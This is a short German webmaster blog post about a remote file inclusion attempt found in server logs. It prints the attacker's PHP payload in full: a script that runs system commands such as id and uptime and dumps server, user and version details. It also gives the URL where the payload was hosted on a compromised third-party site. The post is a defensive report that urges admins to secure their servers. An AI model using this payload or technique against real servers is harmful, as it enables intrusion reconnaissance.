Wollte mir da schon wieder mal jemand eine Datei unterschieben ?
Ich gehöre zu den Webmastern, die regelmäßig die Logfiles analysieren, vor allem im Hinblick auf Spammern und sonstigen Unrat des Webs. Immer wieder mal finde ich da einen Versuch, der mir eine Datei unterschieben soll – wie ich annehme. Meist sind das irgendwelche kryptischen URLs, doch dieses Mal hat mich das schon stutzig gemacht, denn die Domain, war die der Gitarrenjugend Loga.
Ich habe mir die Textdatei mal angesehen, was man mir da denn schönes geben wollte und siehe da, mein Server sollte wohl ausgelesen werden:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 | <? echo "BraT<br>"; $alb = @php_uname(); $alb2 = system(uptime); $alb3 = system(id); $alb4 = @getcwd(); $alb5 = getenv("SERVER_SOFTWARE"); $alb6 = phpversion(); $alb7 = $_SERVER['SERVER_NAME']; $alb8 = gethostbyname($SERVER_ADDR); $alb9 = get_current_user(); $os = @PHP_OS; echo "os: $os<br>"; echo "uname -a: $alb<br>"; echo "uptime: $alb2<br>"; echo "id: $alb3<br>"; echo "pwd: $alb4<br>"; echo "user: $alb9<br>"; echo "phpv: $alb6<br>"; echo "SoftWare: $alb5<br>"; echo "ServerName: $alb7<br>"; echo "ServerAddr: $alb8<br>"; echo "0wnW4y<br>"; exit; ?> |
URL dazu: http://www.gitarrenjugend-loga.de/news/include/safe1.txt
Für die Datei kann die Gitarrenjugend wahrscheinlich nichts, weil die dort über Hintertürchen gelandet ist – zumindest ist da in den meisten Fällen so. Aber dennoch könnte es dazu führen, daß eben unbescholtene Bürger als Bösewichte hingestellt werden. Also Leute: Server sichern!
Gute Infos zu diesem Thema gibt es übrigens zum Beispiel hier
Das News-Script wurde auf den neusten Stand gebracht und die Sicherheitslücke dadurch inzwischen geschlossen.